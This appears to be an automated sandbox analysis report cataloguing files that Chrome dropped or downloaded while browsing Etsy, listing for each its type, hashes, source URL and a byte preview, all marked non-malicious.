                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IIY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VIY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VIY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VIY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 9 21:32:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2677
                                                                                                                                                                Entropy (8bit):4.005167455533498
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:96C42AD1D1E3CCF943BF2FF6F69F67E1
                                                                                                                                                                SHA1:6D93770D110183B7832262CB30DBD43A0691692A
                                                                                                                                                                SHA-256:519832E71443270D9C5D890F39E62D6304F4DFFE60306EA5A00798874C23D917
                                                                                                                                                                SHA-512:EAB41C92EFBD521D55A508F03BE728108D094646A9AB1E2072B5D91CFF1EBD02209716BD073D4F7E135B2106AF0B061226D61D40D26200B6ECED5479516F4CBE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:L..................F.@.. ...$+.,......(....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IIY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VIY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VIY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VIY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VIY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 9 21:32:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2677
                                                                                                                                                                Entropy (8bit):3.992740327385516
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:76C315946100DEE5EA40673C7D93F1B8
                                                                                                                                                                SHA1:3CF9ACB0F8843BEBA6E1E29D3CF5E797DB0A6470
                                                                                                                                                                SHA-256:E92C5808A1F0B0666268411C02DAB1468BCD357DDF3B32218380B934A2997B96
                                                                                                                                                                SHA-512:6F0C71A1347209E9CE3CCD90574B26406647B6FAAFDA892AE8CB636EDB59ABDD84CF71244E42320B80F58619D13D65B96CA8C5F6972D19AB96C8AF8A3AB94510
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:L..................F.@.. ...$+.,......(....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IIY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VIY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VIY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VIY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VIY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 9 21:32:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2679
                                                                                                                                                                Entropy (8bit):4.000092858491478
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C3AF718CED0376F1047B000E9C9ED5DB
                                                                                                                                                                SHA1:4C9197F51F866C187731D9CB0DA4DF0D824ECB1F
                                                                                                                                                                SHA-256:660574F1A37442BAB3CD9234A1FB4BAF7E646530C567455438AB3D3BA3A9B277
                                                                                                                                                                SHA-512:D2D2519CDE68347B29D4716CA91E2AD2539C38931EF9892AE3EBC1188FE10BA9B3479BCF523BC15042802CDEBFEB109856998D753BA1C770B2623AFBA15FBF99
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:L..................F.@.. ...$+.,.......(....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IIY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VIY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VIY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VIY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VIY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 340x270, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):28010
                                                                                                                                                                Entropy (8bit):7.993185817650138
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:03B7F1F9716D1353EA7A431083495C2C
                                                                                                                                                                SHA1:8DE5F0944D0093F68CC3C31634ADDC40012023F7
                                                                                                                                                                SHA-256:48867893B93245A250DE7C8812BE781265AFFE9A5633B2C4F9D20BC45EF692C7
                                                                                                                                                                SHA-512:B5469ECD38D38254BECDC591C24ACAC5BF12E437EFADB3AABD0A7D98208E4A200730B2F30D01FBE689F861CE3136883F2E68D9F7A0F4EF7F742E7EC3EF2D474C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/41680084/r/il/f09928/5191407963/il_340x270.5191407963_rurr.jpg
                                                                                                                                                                Preview:RIFFbm..WEBPVP8 Vm...2...*T...>E..C....jo.(.D..ewCm...|....\...mm.._...{.}..~..........[.....G.OP...:..v....b.............O.o.~K..........I.~.......O........o.^+..........7}.~..k.o..............................8.........^.?........u....._.r.Y...W.a......._...?.=......o....{#.....O.B.G.....s|Z...7..e\...../A..._....O^.@.....W.N1E.J.v.2%,.....P.z..T...)....V\...nU...4..'{4[...R..L....u...!k@..|c.>V4.YP@..>!n.+.Z_..]X..S.u..Q....Z^...9......._`.>/|..Y.............M....9.Xr..].\A.?..S..U...7 .#.....|..G...We..p'...tqp|.....pmu..K....%mK:...F.......u6::a...PK..B.._.Z..6.Tr...f.^...:<.VHG}..I6n.j.....%.i...y..G.....-.".0x."(..}>h..T.3.n....k}...D.l....a(..W......a7..y);.@=Z.U........^G..>.i.zL#6..k.6...6...3.%....\.W.h..1....kW.......^p~HD....R]`....+b....\hyD.....uQ.R..vF..!...*.2'.h..eSe.z....E..iV..e&...-.D.#..Er_..'......?l...Sq..b................GA-s.6..^g.\..V.U.@!.(@........} .$.V..X9..V..N..._..t...JSW..9..b?..6O.... \H....uqj.^.b
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):43
                                                                                                                                                                Entropy (8bit):3.0314906788435274
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=39&external_user_id=01663e82-0e2f-420f-b90f-7998409ba725&expiration=1731105243&gdpr=0&gdpr_consent=&C=1
                                                                                                                                                                Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (487)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):488
                                                                                                                                                                Entropy (8bit):4.841686487844174
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:2775054C068B37509E0798448F7FD32C
                                                                                                                                                                SHA1:8CCB907373C30EB3B98D5A24EC92141A938F09F5
                                                                                                                                                                SHA-256:484EF4268F1D679C1AE88C06FC2388D39AFC441465732617E5E2CDC2E3D418E2
                                                                                                                                                                SHA-512:5423F06453EA452614E21391C098D252DDB65ABC958C02664D9B6F1BD3BAD858B396B053C57AA714391C8953F849FAC3B6ECB9AA0C4F74F4FB81C1242B485EB4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:var TTDCM = function () { function n(t) { var e = "iframe_" + this.mapIndex++, i = document.createElement("iframe"); i.setAttribute("id", e), i.setAttribute("allowTransparency", !0), i.setAttribute("height", 0), i.setAttribute("width", 0), i.setAttribute("src", t), document.body.appendChild(i) } this.init = function (t) { if (this.sslOnly = "https:" == location.protocol, void 0 !== t && null != t && 0 != t.length) for (var e = t.length, i = this.mapIndex = 0; i < e; i++)n(t[i]) } };.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (28285)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):106553
                                                                                                                                                                Entropy (8bit):5.459709932570511
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:B5FB15A2D7AF0A8FE2B440FD228535A4
                                                                                                                                                                SHA1:06E445632B1DC89FF6A7A23C1C8DA839D3C28225
                                                                                                                                                                SHA-256:FF81B3968A9CA8138D78BCF7D0E57E660FA208DEAD1D2865EDC8F00213362911
                                                                                                                                                                SHA-512:B1C749D89021C26629FFE381E9C378303B422148388173DBB5CBBC64AEA442F68B45BD2E5731A47B8469517F946608BB19E5AF6D858A6A029A384C9B4D899574
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://transcend-cdn.com/cm-test/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js
                                                                                                                                                                Preview:// Copyright 2024 Transcend Inc. All Rights Reserved..// Learn more at https://transcend.io/consent-management..self.transcend=Object.assign({"country":"US","countryRegion":"NY"},self.transcend);self.transcend=Object.assign({readyQueue:[],ready(c){this.readyQueue.push(c)},showConsentManager(){this.ready((t)=>{t.showConsentManager()})}},self.transcend);self.airgap=Object.assign({readyQueue:[],ready(c){this.readyQueue.push(c)},purposes:{"useDefault":false,"types":{"Functional":{"name":"Functional","description":"Personalization, autofilled forms, etc.","defaultConsent":"Auto","showInConsentManager":true,"configurable":true,"essential":false,"trackingType":"Functional","optOutSignals":["DNT"]},"Att":{"name":"Att","description":"iOS App-Tracking Transparency","defaultConsent":"Auto","showInConsentManager":false,"configurable":true,"essential":false,"trackingType":"Att","optOutSignals":[]},"SaleOfInfo":{"name":"SaleOfInfo","description":"Sale of personal information.","defaultConsent":"Auto
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):13
                                                                                                                                                                Entropy (8bit):2.7773627950641693
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://td.doubleclick.net/td/ga/rul?tid=G-KR3J610VYM&gacid=759860771.1728513240&gtm=45je4a70v868381678z86935543za200zb6935543&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685~101747727&z=1886270896
                                                                                                                                                                Preview:<html></html>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (5674)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):5857
                                                                                                                                                                Entropy (8bit):5.254228775068228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:59FBA3BC1D78DEC5815C1DB077D94A53
                                                                                                                                                                SHA1:A85B5534B997DEBF642F0A7C33EEB4430A4A30FB
                                                                                                                                                                SHA-256:5339520E35DF689BDB8D7EF0EBEB045E9D20CF2C99632010125871D116CB45FC
                                                                                                                                                                SHA-512:4640C0731E8627853540803718DB4FD6CD5DFC5821BFCA888F5ED13E5B75D8F6233BCB522853369E37F86F57617FD6E325BC24CBF858DB8A3A1F26F814EAE861
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/async/common-entrypoints/auto/@etsy-modules/CategoryNav/Views/DropdownMenu/Menu.24f8a618c2f7ed4bd2d6.js
                                                                                                                                                                Preview:"use strict";(self["jsonp-common-entrypoints"]=self["jsonp-common-entrypoints"]||[]).push([[6464],{7878:(e,t,n)=>{n.r(t);n.d(t,{DropdownMenu:()=>f});var i=n(73035);var o=n(50091);var r=n(62070);var a=n(25259);var s=n(53260);var d=n(23860);var l=n(93319);function u(e,t,n){t in e?Object.defineProperty(e,t,{value:n,enumerable:true,configurable:true,writable:true}):e[t]=n;return e}const c={CONTEXT:".dropdown-category-menu",MENU_BODY:".dropdown-category-menu__body"};const h={KEY:"submenu",NAME:"Etsy\\Modules\\CategoryNav\\Specs\\DropdownCatNav\\DropdownSubmenu"};const p=2;const v=200;class f{constructor(){u(this,"context",null);u(this,"menu",null);u(this,"nodes",[]);u(this,"activeNodes",[]);u(this,"parentNodes",[]);this.context=document.querySelector(c.CONTEXT);this.loadSpec()}loadSpec(){o["default"].fetchOne(h.KEY,h.NAME,{},"GET",true).done((e=>{if(e.output&&e.output[h.KEY]){var t;const n=null===(t=this.context)||void 0===t?void 0:t.querySelector(o["default"].DEFAULT_PLACEHOLDER_SELECTOR);
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):13454
                                                                                                                                                                Entropy (8bit):7.987297485116627
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:81C6BFFF97EFFC5876084F38DAF0DEB5
                                                                                                                                                                SHA1:D5E8E97C4887778A8EA5C26F92FD171EF67066AC
                                                                                                                                                                SHA-256:220E5E735C3B9F638EFB734F6AD603A0731EE6146ABB74CC0A6F7F77DE29817C
                                                                                                                                                                SHA-512:FDC7680B38AD15197E5F5673929CBAD8BC216AFBA16509AD3892FC94EE473FF1318877ABF5E7DC30F5E946231FBF74D0FEC58E1D880A0854F75AC8C292E56422
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/24426965/c/2261/2261/0/270/il/64732a/4144763037/il_300x300.4144763037_cm8c.jpg
                                                                                                                                                                Preview:RIFF.4..WEBPVP8 z4..p....*,.,.>E..D....<.(.D....@........~...7..9'x.ivj...g...3.t.u....."-c.?.o...}....?.~...y/......8........>h.U.{...^1..~A......../.~............#..?....).+.../.........p.._...~l.........>&.U.../............M.....;.k............_.q......./.............g.#...O._..t..Z...i>.L.k..Q.h...}.....U.E.#..%.'.k....a.H0............4O..~...m.]Xc../h...9..,....+.n..*F.js.c..G..D.W...3.9h+--:.Y..D..>S.z...;c$3Z.b..ZGY.d...~F..N.....Ax........x..X2J.N...q.}`..TVx.x..9.i..q......,.....W.........C..ayE..T.y...n2.Ei:g.D]......:..8.....?.W.4.f..E1...d..S.m'-..z.%$.y.Un?...n.97C....oZ...?0...>4.z....._B.(/...g..x.N..@C...s..V..n].../...B..Z.{...%.o.]..|..]..G.e...G..D..zo..W.$.#...I.$+...yX....K#5s..J.WX$..V5..............:..w..|..I2.B.h...P....*.X....E.(G..E@{]...S(.K..-.....d. .......t..[...:Is..(.,:.I..q>...).e.It .YN.4..5.a....Ey.Fo...0.2.`.48g"7.....M.r.Lv........<-..#............3.Z...k.....xS...TKCux%_....{....V.O...e.<v..K.wM2........V
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4927
                                                                                                                                                                Entropy (8bit):4.9021827024699975
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:7D683E03EF66A8BDBE92DDBE12F0039D
                                                                                                                                                                SHA1:42F370CA0829EF9CF92D564A284A2D4E04D0E5A6
                                                                                                                                                                SHA-256:0F67617768D6E34B2C8E91F5C09448E7DD97F691428FE9737C9329381650AE98
                                                                                                                                                                SHA-512:E56F5E8A87CEC399504E9A387F7E970148C032EFDB7492062B7F769E8910A0C30D96036FBB4B7413052870FDB8278BA3FF77612A147D187DFABA8F4A87D05E8B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/api/v3/ajax/bespoke/public/neu/specs/submenu?log_performance_metrics=false&specs%5Bsubmenu%5D%5B%5D=Etsy%5CModules%5CCategoryNav%5CSpecs%5CDropdownCatNav%5CDropdownSubmenu
                                                                                                                                                                Preview:{"render_aborted":false,"abort_render_data":[],"output":{"submenu":"<div role=\"menu\" class=\"wt-menu__body wt-pt-xs-2 wt-pb-xs-2 ge-you-menu-dimensions wt-z-index-10 dropdown-category-menu__body\" data-wt-menu-body type=\"option\">\n <a href=\"\/c\/accessories?ref=catnav-1\" class=\"wt-menu__item wt-display-block wt-text-truncate wt-width-full wt-pr-xs-1 wt-position-relative wt-max-width-full \" role=\"menuitem\" tabindex=\"-1\" data-level=\"1\">\n Accessories\n <\/a><a href=\"\/c\/art-and-collectibles?ref=catnav-66\" class=\"wt-menu__item wt-display-block wt-text-truncate wt-width-full wt-pr-xs-1 wt-position-relative wt-max-width-full \" role=\"menuitem\" tabindex=\"-1\" data-level=\"1\">\n Art & Collectibles\n <\/a><a href=\"\/c\/baby?ref=catnav-12545\" class=\"wt-menu__item wt-display-block wt-text-truncate wt-width-full wt-pr-xs-1 wt-position-relative wt-max-width-full \" role=\"menuitem\" tabindex=\"-1\" data-level=\"1\">\n Baby\n <\/a><a href=
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 340x270, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):45385
                                                                                                                                                                Entropy (8bit):7.969042642193365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:2E5E7A312A76B6A4B40C5A0E12869F13
                                                                                                                                                                SHA1:1D936F699E033146E17CCA1A397CDF61E7D2D1F6
                                                                                                                                                                SHA-256:5E5E3C1F856BE3BC367A2BBC7F1647553EE6FED88B6D5451446680FB23D2570E
                                                                                                                                                                SHA-512:D48F609D136C9AC6C3856BBE623421A6DB3B8D7E95A0B175DE6DCCC4BDBE7F1F43F6C9211AB96E8F83E88F01BE56F58A1E8B71A3832D13D07C00EC85AE7BBCF2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0....................................................................%%2..............................................................%%2........T.."..........8.....................................................................%.....5wqA...y.Gv....4~......._............I..3f[..v.+{`.=..7v..?...k..M.c.?.q..'...{S.g..P.r...Cj..LP.t....#.*....89X.........T{...@.[(....3"T.).A.......4rt...yU..H.M.3...~.c-.+....g....m.T?Cn.F.>x
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):328746
                                                                                                                                                                Entropy (8bit):5.60743181452084
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:E6BDE5FDA8A06AD94FB2F036EF59C7B5
                                                                                                                                                                SHA1:A47511B4DDC701060C464EADC43FBE574DDB3F73
                                                                                                                                                                SHA-256:5F2442870678874B56230067CF264CB65EBA56F57763D60879CD6B739DEF0AA0
                                                                                                                                                                SHA-512:BAD77F87BA7AE327DBF3849E1455FCC04D761C5CBC6CD2DD63C4FC59E243A01AF733689CA0EBF24D94FC17522F972AABF7EE656A2E9651A72537405403856362
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.googletagmanager.com/gtag/js?id=G-KR3J610VYM&l=dataLayer&cx=c
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":16,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):9458
                                                                                                                                                                Entropy (8bit):7.978883688583429
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0260A4D0FC548BBA8E046EB588B2212B
                                                                                                                                                                SHA1:4A8314FB0DC6D11A903110A68FBD3690911241EE
                                                                                                                                                                SHA-256:30C8253DA57F7BF4CE743D6BAB4DC183677B16DEE0D68BEE9941AF312681C0C8
                                                                                                                                                                SHA-512:B4FDDEF8DF772EE56BFCCDEF11105EAFFDBE5408DC3969B61EBDEA01341385E1BC14116CF157BCEB188A7550F441021BB22DCCCB421440837BECC130EC6A9B3E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/25168585/c/1800/1800/298/0/il/e0da11/5460954945/il_300x300.5460954945_9tu4.jpg
                                                                                                                                                                Preview:RIFF.$..WEBPVP8 .$..p....*,.,.>E .D..!.....P..imV_o;.....g....9......q..nd$<.x.../.m...K....?*^..3....9..oQ..}...._r..xc.P....../....r...I.>p}...........,..ON......._.'.....z0...G.....?......A....>Q.....hVu..R.:..]...<....:..&. 1..!N~>.O..6,.....!z.....K.QS0..g.fl.A..*..o...J..'/_.f<b.1A..Q..@K..Ew...&%j...)kX.m.(8...y;Uw......V....X.'....2..P..L..s@..0..<...t(.7.M..C..@.......^kBx.d..^`.... ..v,X..ir.V.l...9=..!......p..0./.3B .t-?.s...b.Xx.....]d..q^h....Wb......T..&..^C.....]e....;.tB.n...d......v..6.az.E..e.lb..5....J..v.......G.&5..&.BW.8..K...@..o.. ....2...i.`...WQ..nQ.........pQo..<;.w...H3....*O...U...<...2.....}cR..,@s..D._.$a...3..G....~....vjP$N...d.&.v..U..*)....}yBJ.O...j.7|.;F.=......-r...@....Rng.6....`. ......d.V`...&S..S..a.u..\..?..Xv/6........6.5."D0.y,...!R.....,%......w..gm..[.... aKw...;Z......Z..V..3...4.H...F..D{`.`.ZD<r.$... .h...}..:..B.....^.S..m`...WZ.3#.P.cl1V|q...dT.X.9>.2...YG.9X['..'...j..L......,..}./-.y..g
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
